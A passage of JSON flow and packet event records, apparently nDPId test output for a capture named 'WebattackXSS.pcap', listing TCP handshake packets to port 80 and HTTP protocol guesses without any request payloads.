-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347313106,"flow_last_seen":1499347313106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313106,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1499347313106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347313106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80LNAAD4G9RysEAABwKgKMto0AFBr7OnzAAAAAKACchD0JAAAAgQFtAQCCAoBOjlAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":1499347313106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347313106,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2jRgNfxEa+zp9KAScSCJ7wAAAgQFtAQCCAoD5Aq2ATo5QAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":3,"flow_last_seen":1499347313106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347313106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00LRAAD4G9SOsEAABwKgKMto0AFBr7On0YDX8RYAQAOUo9wAAAQEICgE6OUAD5Aq2"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347186286,"flow_last_seen":1499347191666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347186286,"flow_last_seen":1499347191666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347187548,"flow_last_seen":1499347192666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347187548,"flow_last_seen":1499347192666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347188799,"flow_last_seen":1499347194667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347188799,"flow_last_seen":1499347194667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347190051,"flow_last_seen":1499347195667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347190051,"flow_last_seen":1499347195667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347191299,"flow_last_seen":1499347196667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347191299,"flow_last_seen":1499347196667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347192547,"flow_last_seen":1499347197669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347192547,"flow_last_seen":1499347197669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347314358,"flow_last_seen":1499347314358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347314358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1499347314358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347314358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wpZAAD4GAzqsEAABwKgKMtpCAFAntfjvAAAAAKACchAoGQAAAgQFtAQCCAoBOjp5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":2,"flow_last_seen":1499347314358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347314358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2kLsSHY8J7X48KAScSC2nwAAAgQFtAQCCAoD5AvvATo6eQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":3,"flow_last_seen":1499347314359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347314359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wpdAAD4GA0GsEAABwKgKMtpCAFAntfjw7Eh2PYAQAOVVpwAAAQEICgE6OnkD5Avv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347315631,"flow_last_seen":1499347315631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347315631,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1499347315631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347315631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8y+VAAD4G+eqsEAABwKgKMtpQAFAKdfBSAAAAAKACchBMqgAAAgQFtAQCCAoBOju3AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":2,"flow_last_seen":1499347315631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347315631,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2lDsZegJCnXwU6AScSBoCAAAAgQFtAQCCAoD5A0tATo7twEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":3,"flow_last_seen":1499347315631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347315631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0y+ZAAD4G+fGsEAABwKgKMtpQAFAKdfBT7GXoCoAQAOUHEAAAAQEICgE6O7cD5A0t"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347318180,"flow_last_seen":1499347318180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347318180,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1499347318180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347318180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81llAAD4G73asEAABwKgKMtpqAFAYI+htAAAAAKACchBESgAAAgQFtAQCCAoBOj40AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":2,"flow_last_seen":1499347318180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347318180,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2mqVHZfsGCPobqAScSAEkQAAAgQFtAQCCAoD5A+qATo+NAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":3,"flow_last_seen":1499347318181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347318181,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01lpAAD4G732sEAABwKgKMtpqAFAYI+hulR2X7YAQAOWjmAAAAQEICgE6PjQD5A+q"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347319466,"flow_last_seen":1499347319466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347319466,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1499347319466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347319466,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vPhAAD4GCNisEAABwKgKMtp4AFBaBoOOAAAAAKACchBl9gAAAgQFtAQCCAoBOj92AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":2,"flow_last_seen":1499347319466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347319466,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ni9VjICWgaDj6AScSBirAAAAgQFtAQCCAoD5BDsATo\/dgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":3,"flow_last_seen":1499347319467,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347319467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vPlAAD4GCN+sEAABwKgKMtp4AFBaBoOPvVYyA4AQAOUBtAAAAQEICgE6P3YD5BDs"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347320712,"flow_last_seen":1499347320712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347320712,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1499347320712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347320712,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tK5AAD4GESKsEAABwKgKMtqGAFAqvPQDAAAAAKACchAjhgAAAgQFtAQCCAoBOkCtAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1499347320712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347320712,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2oZaSFgWKrz0BKAScSBb\/wAAAgQFtAQCCAoD5BIjATpArQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1499347320712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347320712,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tK9AAD4GESmsEAABwKgKMtqGAFAqvPQEWkhYF4AQAOX7BgAAAQEICgE6QK0D5BIj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347323234,"flow_last_seen":1499347323234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323234,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1499347323234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347323234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CttAAD4GuvWsEAABwKgKMtqgAFDxkUn\/AAAAAKACchAEJAAAAgQFtAQCCAoBOkMkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1499347323234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347323234,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2qDnEfYn8ZFKAKAScSAPSwAAAgQFtAQCCAoD5BSaATpDJAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":3,"flow_last_seen":1499347323235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347323235,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CtxAAD4GuvysEAABwKgKMtqgAFDxkUoA5xH2KIAQAOWuUgAAAQEICgE6QyQD5BSa"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347195099,"flow_last_seen":1499347200670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347195099,"flow_last_seen":1499347200670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347196341,"flow_last_seen":1499347201670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347196341,"flow_last_seen":1499347201670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347197627,"flow_last_seen":1499347202671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347197627,"flow_last_seen":1499347202671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 